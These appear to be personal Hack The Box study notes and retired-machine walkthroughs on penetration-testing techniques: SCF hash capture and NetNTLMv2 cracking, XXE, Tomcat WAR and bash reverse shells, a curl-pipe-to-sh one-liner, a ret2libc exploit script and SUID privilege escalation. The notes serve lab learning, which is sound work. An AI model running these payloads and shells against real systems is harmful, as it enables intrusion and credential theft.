Hack the box

How to connect

  1. Download the OpenVPN configuration file from HTB
  2. Install OpenVPN: pacman -S openvpn
  3. Connect to the VPN: sudo openvpn /path/to/the/config

Machines similar to OSCP https://docs.google.com/spreadsheets/d/14J_N8bT27H4x4ZKpP-xoKm3OUoDW9cjPlLjn3Ztxuug/edit#gid=1839402159

Techniques

SQL injection with sqlmap

  1. First save the raw HTTP request to a file (copy it from Burp Suite)
  2. Let sqlmap replay it and test every parameter in it: sqlmap -r $(pwd)/request_file

SMB share - SCF file attacks

The idea: if we can plant a file on a shared drive that users browse, Windows Explorer will try to render the icon the file points to. With an IconFile on a UNC path we control:

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Explorer sends SMB requests for the icon as soon as the folder is opened and authenticates to our host with the browsing user's credentials (NetNTLMv2). The file has to have the .scf extension.

Then we use Responder to listen for those connections and capture the hashes (-I is the interface the victim can reach, tun0 on HTB):

responder -I tun0 -wrf --lm -v


Crack with John the Ripper

  • let's crack a hash, e.g. md5crypt (from PHP's crypt()) or NetNTLMv2 (as captured by Responder)
    • john hashes.txt --wordlist=/usr/share/dict/rockyou.txt --format=md5crypt-long
    • for Responder captures use --format=netntlmv2 (hashcat mode 5600)
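How the captured hash is actually checked, as an added example that is not from this page: Responder writes one NetNTLMv2 line per capture (user::domain:server_challenge:NTProofStr:blob, hex fields) and john --format=netntlmv2 or hashcat -m 5600 recompute NTProofStr for every wordlist candidate until one matches. The script below does the same in pure Python, with its own MD4 so it works even where hashlib has no md4 (OpenSSL 3 default provider). The user name, domain, challenge, blob and wordlist are constructed for the example, not a real Responder log.

```python
import hmac
import struct
from hashlib import md5


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; NT hashes are MD4 over UTF-16LE passwords."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                        # round 1: F
            t = (a + ((b & c) | (~b & d)) + x[i]) & mask
            a, b, c, d = d, rotl(t, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                        # round 2: G
            t = (a + ((b & c) | (b & d) | (c & d)) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & mask
            a, b, c, d = d, rotl(t, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                        # round 3: H
            t = (a + (b ^ c ^ d) + x[r3[i]] + 0x6ED9EBA1) & mask
            a, b, c, d = d, rotl(t, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5(NTLMv2 key, challenge || blob), NTLMv2 key = HMAC-MD5(NT hash, upper(user) || domain)."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, md5).digest()


def parse_capture(line: str):
    """Split Responder's NTLMv2-SSP line: user::domain:challenge:NTProofStr:blob."""
    user, _, rest = line.strip().partition("::")
    domain, chal, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """Offline dictionary attack: return the candidate whose NTProofStr matches, else None."""
    user, domain, chal, proof, blob = parse_capture(line)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed capture (not a real Responder log): what the user who opened the share
# with the planted .scf would leak. Challenge and blob are arbitrary but well-formed.
_NAME = "WORKGROUP".encode("utf-16le")
_CHALLENGE = bytes.fromhex("1122334455667788")
_BLOB = (b"\x01\x01" + b"\x00" * 6                              # RespType, HiRespType, reserved
         + bytes.fromhex("c0653150de09d201")                     # timestamp (FILETIME)
         + bytes.fromhex("aabbccddeeff0011")                     # client challenge
         + b"\x00" * 4                                           # reserved
         + b"\x02\x00" + struct.pack("<H", len(_NAME)) + _NAME   # AV_PAIR: NetBIOS domain name
         + b"\x00" * 4 + b"\x00" * 4)                            # MsvAvEOL, reserved
SAMPLE_LINE = "pentestlab::WORKGROUP:{}:{}:{}".format(
    _CHALLENGE.hex(),
    nt_proof("Summer2021!", "pentestlab", "WORKGROUP", _CHALLENGE, _BLOB).hex(),
    _BLOB.hex(),
)
WORDLIST = ["123456", "password", "Winter2020", "Summer2021!"]

if __name__ == "__main__":
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

Because the server challenge and client blob are part of the HMAC input, a captured NetNTLMv2 response cannot be replayed later and is only useful for this kind of offline guessing (or for relaying while the session is live), which is why a strong password is the actual defence against SCF planting.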

WAR upload reverse shell

  • if we are in a Tomcat environment
    • the manager application (/manager/html and /manager/text) allows deploying new applications (it needs credentials with the manager-gui or manager-script role)
    • we can create a malicious WAR file https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat
    • msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.103 LPORT=4242 -f war > reverse.war
    • now open a netcat listener before deploying it
      • sudo nc -nvlp 4242

Fuzzing

  • enumerates directories and files on a web server (--hc 404 hides the not-found responses)
  • wfuzz -w /usr/share/dict/directory-list-2.3-medium.txt --hc 404 http://10.10.11.101/FUZZ
  • you can also do it for specific extensions:
  • wfuzz -w /usr/share/dict/directory-list-2.3-medium.txt --hc 404 http://10.10.11.101/FUZZ.php

Port discovery

  • full TCP sweep first: sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
    • open: 80, 135, 445, 5985
  • then scripts and version detection only on those: nmap -sC -sV -p80,135,445,5985 10.10.11.106 -oN ports
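The two-step scan above (sweep every port, then -sC -sV on the ones found) is usually glued together by reading the ports back out of the -oG file. Added example, not code from the page: a small parser for nmap's grepable output that returns the open ports per host and builds the follow-up command. The scan text below is constructed to match the ports the page found; it is not real output.

```python
import re

# Constructed -oG output shaped like the page's allPorts file (not a real scan).
SAMPLE_GREPABLE = """\
# Nmap 7.92 scan initiated as: nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
Host: 10.10.11.106 ()\tStatus: Up
Host: 10.10.11.106 ()\tPorts: 80/open/tcp//http///, 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///, 5985/open/tcp//wsman///\tIgnored State: filtered (65531)
# Nmap done -- 1 IP address (1 host up)
"""

# Each entry in the Ports field is port/state/protocol/owner/service/rpcinfo/version/
PORT_ENTRY = re.compile(r"(\d+)/open/(tcp|udp)/")


def extract_open_ports(grepable: str) -> dict:
    """Return {host: sorted open ports} from -oG text.

    Only entries whose state is exactly 'open' count: 'open|filtered' (common for
    UDP) is ignored on purpose so the service scan is not spent on guesses."""
    result = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        found = {int(m.group(1)) for m in PORT_ENTRY.finditer(ports_field)}
        if found:
            result[host] = sorted(set(result.get(host, [])) | found)
    return result


def followup_commands(grepable: str, outfile: str = "ports") -> list:
    """Second-stage scan, one command per host, as the page runs it by hand."""
    return [
        "nmap -sC -sV -p{} {} -oN {}".format(",".join(map(str, ports)), host, outfile)
        for host, ports in extract_open_ports(grepable).items()
    ]


if __name__ == "__main__":
    for cmd in followup_commands(SAMPLE_GREPABLE):
        print(cmd)
```

Feed it the real allPorts file (open(...).read()) and run the printed command; the -oG format is stable enough across nmap versions that the regex does not need adjusting.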

Reverse tunnel with chisel

to install chisel

  1. git clone git@github.com:jpillora/chisel.git
  2. CGO_ENABLED=0 go build, to build chisel as a static binary (so it runs on the victim without a matching libc)
  • on the attacker box: ./chisel server -p 9090 --reverse
  • on the victim box, pointing at the same server port: ./chisel client 10.10.14.6:9090 R:8086:127.0.0.1:8086
  • the victim's 127.0.0.1:8086 is now reachable on the attacker's 127.0.0.1:8086

Escalation basics: SUID / sudo

  • Find SUID binaries: find / -perm -4000 -type f 2>/dev/null
  • Find what I can run with sudo: sudo -l

Bingo, there is an executable we can run with sudo without a password:

    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

XXE (XML External Entity injection)

<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

The &ent; reference is replaced with the content of the file when the server's XML parser resolves external entities; whatever the application echoes back for lastName (the page, or an error message) then leaks it. /etc/shadow is only readable if the parser runs as root, so /etc/passwd is the usual first test.

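What the payload does inside a parser, as an added example that is not code from the page: Python's xml.sax parser can be told to resolve external general entities, which is exactly the condition the XXE above relies on; with that feature off (the default since Python 3.7.1) the same document parses fine but the entity expands to nothing. The file read here is a temporary file holding a made-up shadow line, standing in for /etc/shadow.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class LastNameHandler(ContentHandler):
    """Collects the text of <lastName>, where the page's payload places &ent;."""

    def __init__(self):
        super().__init__()
        self.in_last_name = False
        self.last_name = ""

    def startElement(self, name, attrs):
        self.in_last_name = (name == "lastName")

    def endElement(self, name):
        if name == "lastName":
            self.in_last_name = False

    def characters(self, content):
        if self.in_last_name:
            self.last_name += content


def xxe_payload(target_url: str) -> bytes:
    """The page's document, parameterised on the entity's SYSTEM identifier."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE replace [<!ENTITY ent SYSTEM "' + target_url.encode() + b'"> ]>\n'
        b"<userInfo>\n <firstName>John</firstName>\n <lastName>&ent;</lastName>\n</userInfo>\n"
    )


def parse_user_info(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Return lastName as the application would see it.

    resolve_external_entities=True is the vulnerable configuration: expat fetches the
    SYSTEM identifier (file://, http://...) and splices its text into the element."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = LastNameHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.last_name


def demo():
    """Run the same payload through both configurations against a constructed secret file."""
    secret = "root:$6$constructedsalt$notarealhash:19000:0:99999:7:::"   # made-up shadow line
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "shadow")
        with open(path, "w") as fh:
            fh.write(secret + "\n")
        payload = xxe_payload("file://" + path)
        leaked = parse_user_info(payload, resolve_external_entities=True)
        safe = parse_user_info(payload, resolve_external_entities=False)
    return secret, leaked.strip(), safe.strip()


if __name__ == "__main__":
    secret, leaked, safe = demo()
    print("entities resolved :", repr(leaked))
    print("entities disabled :", repr(safe))
```

The fix on the server side is the second call: leave external entity resolution off (and, for libraries that default it on, such as older lxml or Java's DocumentBuilderFactory, disable DOCTYPE processing outright).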

Reverse shell (bash)

  1. Open a local netcat listener on 443: sudo nc -nvlp 443
  2. Execute the bash reverse shell on the target: bash -i >& /dev/tcp/10.10.15.103/443 0>&1
  3. If that didn't work you can try this one-liner; remember that HTB machines have no internet access, so you have to host the script yourself :)
On the target machine, pipe the output of https://reverse-shell.sh/yourip:port into sh:

curl https://reverse-shell.sh/192.168.0.69:1337 | sh

Use of Metasploit

Samba usermap_script (CVE-2007-2447), as used on the Lame machine:

search cve:2007-244
use  exploit/multi/samba/usermap_script
options
set rhost 10.10.10.3
set lhost 10.10.14.6
exploit


Juicy Potato - Windows escalation

run whoami /priv; if SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled (typical for service accounts such as IIS or MSSQL) we can use Juicy Potato https://github.com/ohpe/juicy-potato to get a SYSTEM shell. It needs a CLSID that is valid for the target's Windows version, and it no longer works on Windows 10 1809 / Server 2019 and later, where PrintSpoofer or RoguePotato are used instead.


EternalBlue

vulnerability in SMBv1, CVE-2017-0144: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144 (fixed by MS17-010, which covers CVE-2017-0143 to CVE-2017-0148; that is why the nmap script below reports 0143)

The NSA allegedly spent almost a year hunting for a bug in Microsoft's software. Once they found it, the NSA developed EternalBlue to exploit the vulnerability. The NSA used EternalBlue for five years before alerting Microsoft of its existence.

to check whether the machine is vulnerable:

$ nmap -p445 --script smb-vuln-\* 10.10.10.40

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

see Machine Blue - Easy - Windows for how to exploit it


Linux process polling

Sometimes it is interesting to know what a cron job is running. One way, without root, is to poll the process list with pspy https://github.com/DominicBreuker/pspy, which shows commands as they are spawned, with their uid.


Escaping a Docker container

capsh --print shows which capabilities we have

capsh --print shows that I have cap_sys_module

with this capability we can load kernel modules, and the kernel is shared with the host, so a crafted module that spawns a reverse shell runs as root on the host: https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module

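The same check without capsh, which minimal container images often lack, as an added example (not from the page): every process exposes its effective capability set as a hex bitmask in /proc/self/status (CapEff), so decoding that line with the numbering from linux/capability.h gives the same answer. The two status excerpts are constructed, one with Docker's default capability set and one with cap_sys_module added; the list of escape-relevant capabilities is the editor's, not the page's.

```python
# Capability numbers from include/uapi/linux/capability.h (list index == CAP_* value)
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]

# Capabilities that commonly turn a container shell into host root: kernel module
# loading, mount/namespace tricks, ptrace of host processes, raw disk access, and
# open_by_handle_at() reads of host files. Editor's selection, not an exhaustive list.
ESCAPE_CAPS = {"cap_sys_module", "cap_sys_admin", "cap_sys_ptrace",
               "cap_sys_rawio", "cap_dac_read_search"}

# The CapEff Docker gives an unprivileged container by default (14 capabilities).
DOCKER_DEFAULT_CAPEFF = 0x00000000A80425FB

# Constructed /proc/self/status excerpts (not taken from a real container).
STATUS_DEFAULT = (
    "Name:\tbash\nUid:\t0\t0\t0\t0\n"
    "CapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n"
    "CapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\nCapAmb:\t0000000000000000\n"
)
STATUS_SYS_MODULE = STATUS_DEFAULT.replace("a80425fb", "a80525fb")   # bit 16 set


def parse_capeff(status_text: str) -> int:
    """Pull the effective capability mask out of /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line in status text")


def decode_caps(mask: int) -> list:
    """Bitmask -> capability names, lowest bit first; unknown bits keep their number."""
    return [CAP_NAMES[i] if i < len(CAP_NAMES) else "cap_%d" % i
            for i in range(mask.bit_length()) if (mask >> i) & 1]


def escape_candidates(mask: int) -> list:
    """The subset of the effective set worth trying to break out with."""
    return sorted(c for c in decode_caps(mask) if c in ESCAPE_CAPS)


if __name__ == "__main__":
    import os
    text = open("/proc/self/status").read() if os.path.exists("/proc/self/status") else STATUS_SYS_MODULE
    mask = parse_capeff(text)
    print("CapEff 0x%016x -> %s" % (mask, ", ".join(decode_caps(mask))))
    print("escape candidates:", escape_candidates(mask) or "none")
```

If CapEff equals Docker's default, the container was not started with --privileged or --cap-add and the capability route is closed; anything beyond that set, cap_sys_module above all, is where to look next.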

Buffer overflow - linux

  • let's copy the binary to our machine to work on it comfortably :)

  • install gef for gdb

    • checksec (in gdb) shows the binary's protections
    • we have NX enabled, meaning we cannot execute code on the stack
    • pattern create gives you a cyclic pattern
    • run "<pattern here>"
    • pattern offset $eip shows the offset to EIP is 52 bytes
  • ret2libc: since NX is enabled (stack execution protection) we return into libc instead of injecting shellcode

    • we need the addresses of system, exit and a "/bin/sh" string
    • on the victim machine, first get the base address of libc
      • ldd <binary> → libc loaded at 0xb7e19000
    • then the offsets of system and exit inside libc
      • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
      • system@@GLIBC_2.0 is at offset 0003ada0
      • exit at 0002e9d0
      • and the offset of a "/bin/sh" occurrence:
        • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh → 15ba0b
    • the full address of each one is libc base + offset
    • ret2libc chain = addr_of_system + addr_of_exit + addr_of_bin_sh (exit is system's return address, the "/bin/sh" pointer its first argument)
  • is ASLR active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes); the base from ldd is only stable when it is 0

exploit script (s4vitar style):

#!/usr/bin/env python3
from struct import pack
from subprocess import call

# padding up to EIP, from gef's pattern create / pattern offset
RELLENO = b"A" * 52

# libc base from ldd on the victim (ASLR off: randomize_va_space = 0)
base = 0xb7e19000
# offsets from readelf -s and strings -a -t x on the victim's libc
system_off = 0x0003ada0
exit_off = 0x0002e9d0
sh_off = 0x15ba0b

system = base + system_off
_exit = base + exit_off
sh = base + sh_off

# 32-bit cdecl: [system][return address for system -> exit][arg0 -> "/bin/sh"]
payload = RELLENO + pack("<I", system) + pack("<I", _exit) + pack("<I", sh)

call(["/home/ayush/.binary/rop", payload])
print(payload)

Machines - Retired

Lame machine (easy)

  • nmap: 21, 22, 139, 445
  • seems there is no ICMP (firewall rules)
  • FTP: anonymous login allowed…
  • let's look at the FTP
    • I found nothing interesting
    • let's see if there is an exploit for this version of the ftpd
    • there is one, but it doesn't seem to work
  • SMB
    • seems to have an exploit as well (Samba usermap_script, CVE-2007-2447)
    • let's go to msfconsole
search cve:2007-244
use  exploit/multi/samba/usermap_script
options
set rhost 10.10.10.3
set lhost 10.10.14.6
exploit


Machine Shocker - Easy

NMAP
80/tcp   open  http         syn-ack ttl 63
2222/tcp open  EtherNetIP-1 syn-ack ttl 63
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
  • fuzz on port 80
    • HINT :( there is a cgi-bin
    • I didn't find it because I did not put the trailing / after FUZZ
    • maybe we should run both wfuzz and dirb
    • HINT: there is an exploit when we see a script in there like user.sh (a shell script served from cgi-bin is the classic Shellshock target)
    • got a reverse shell
    • sudo -l shows that I can run perl as root
    • sudo perl -e 'exec "chmod u+s /bin/bash";' and then bash -p to keep the root euid
  • ssh is OpenSSH 7.2
    • there is a username enumeration vuln for it
    • let's try it out…
    • nothing found there

Machine - Bashed - Easy - Linux

80/tcp open  http    syn-ack ttl 63
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-20 17:25 CEST
Nmap scan report for 10.10.10.68
Host is up (0.034s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

the web page talks about a phpbash project, a web-based shell interface…

let's wfuzz:

000000164:   301        9 L      28 W       312 Ch      "uploads"
000000338:   301        9 L      28 W       308 Ch      "php"
000000550:   301        9 L      28 W       308 Ch      "css"
000000834:   301        9 L      28 W       308 Ch      "dev"
000000953:   301        9 L      28 W       307 Ch      "js"
000002771:   301        9 L      28 W       310 Ch      "fonts"

in the php folder there is http://10.10.10.68/php/sendMail.php; in the js folder there is a script that POSTs the contact form fields to sendMail.php:

        var params = {
            'action': 'SendMessage',
            'name': jQuery('#name').val(),
            'email': jQuery('#contact-email').val(),
            'subject': jQuery('#subject').val(),
            'message': jQuery('#message').val()
        };
        // plain object as data: jQuery sends it form-encoded, not as a JSON body
        jQuery.ajax({
            type: "POST",
            url: "php/sendMail.php",
            data: params,
            success: function (response) {
                if (response) {
                    var responseObj = jQuery.parseJSON(response);
                    if (responseObj.ResponseData)
                    {
                        alert(responseObj.ResponseData);
                    }
                }
            }
        });

in the dev folder we found phpbash.php: we got a shell as www-data! /etc/passwd:

root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false  
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false  
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false  
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false  
syslog:x:104:108::/home/syslog:/bin/false  
_apt:x:105:65534::/nonexistent:/bin/false  
messagebus:x:106:110::/var/run/dbus:/bin/false  
uuidd:x:107:111::/run/uuidd:/bin/false  
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash  
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash
User www-data may run the following commands on bashed:  
(scriptmanager : scriptmanager) NOPASSWD: ALL
  • we spawned a reverse shell to work with a proper terminal, then switched user with the sudo rule above:
$ sudo -u scriptmanager bash
  • there is a /scripts folder with a test.py that writes a file test.txt, and test.txt is owned by root :thinking: so something running as root (most likely a cron job; pspy would show it) is executing the scripts in that folder

Machine - Nibbles - Easy - Linux

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • on port 80:
    • there is a subfolder named nibbleblog
    • Metasploit/searchsploit list multiple SQL injections for Nibbleblog:
    http://www.example.com/index.php?page=[SQLi]
    http://www.example.com/post.php?idpost=[SQLi]
    
    • nothing there…
    • the admin folder has directory listing enabled, so all the code can be read
    • http://10.10.10.75/nibbleblog/README gives the version: 4.0.3
    • searchsploit has an arbitrary file upload for that version (authenticated)
  • let's try to upload a shell with that vulnerability
    • we cannot yet: it needs a valid user first
  • this is the password-change handler in the code we can read:
    // =====================================================================
    //	POST
    // =====================================================================
    if( $_SERVER['REQUEST_METHOD'] == 'POST' )
    {
    	$new_salt = Text::random_text(11);
    	$new_hash = Crypt::get_hash($_POST['pw_new'],$new_salt);
    	$text = '<?php $_USER[0]["uid"] = "0"; $_USER[0]["username"] = "'.$_USER[0]['username'].'"; $_USER[0]["password"] = "'.$new_hash.'"; $_USER[0]["salt"] = "'.$new_salt.'"; $_USER[0]["email"] = "'.$_USER[0]['email'].'"; ?>';
    	$file = fopen(FILE_SHADOW, 'w');
    	fputs($file, $text);
    	fclose($file);
    	Session::set_alert($_LANG['PASSWORD_HAS_BEEN_CHANGED_SUCCESSFULLY']);
    	// Redirect to Dashboard
    	Redirect::controller('admin','dashboard','view');
    }
    
    • mirror the whole code with wget --recursive $URL (--spider only checks the links, it does not save anything)
    • in the end the password was admin:nibbles
  • now that we have a user, the Metasploit module for the file upload vulnerability works :)
    • we got the shell
  • in nibbler's home we found a personal.zip that contains a script
  • sudo -l shows we can run the decompressed script as root
  • I just replaced its content with chmod u+s /bin/bash
  • ran it with sudo, then bash -p for the root shell

Machine Beep - Easy - Linux - abandoned

Host is up, received user-set (0.043s latency).
Scanned at 2021-10-20 22:21:44 CEST for 12s
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE          REASON
22/tcp    open  ssh              syn-ack ttl 63
25/tcp    open  smtp             syn-ack ttl 63
80/tcp    open  http             syn-ack ttl 63
110/tcp   open  pop3             syn-ack ttl 63
111/tcp   open  rpcbind          syn-ack ttl 63
143/tcp   open  imap             syn-ack ttl 63
443/tcp   open  https            syn-ack ttl 63
878/tcp   open  unknown          syn-ack ttl 63
993/tcp   open  imaps            syn-ack ttl 63
995/tcp   open  pop3s            syn-ack ttl 63
3306/tcp  open  mysql            syn-ack ttl 63
4190/tcp  open  sieve            syn-ack ttl 63
4445/tcp  open  upnotifyp        syn-ack ttl 63
4559/tcp  open  hylafax          syn-ack ttl 63
5038/tcp  open  unknown          syn-ack ttl 63
10000/tcp open  snet-sensor-mgmt syn-ack ttl 63
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-20 21:51 CEST
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
3306/tcp open  mysql      MySQL (unauthorized)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4445/tcp open  upnotifyp?
  • port 111: check which RPC endpoints are registered (full -sV scan below)

    PORT      STATE SERVICE    VERSION
    22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
    |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
    25/tcp    open  smtp       Postfix smtpd
    |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
    80/tcp    open  http       Apache httpd 2.2.3
    |_http-server-header: Apache/2.2.3 (CentOS)
    |_http-title: Did not follow redirect to https://10.10.10.7/
    110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
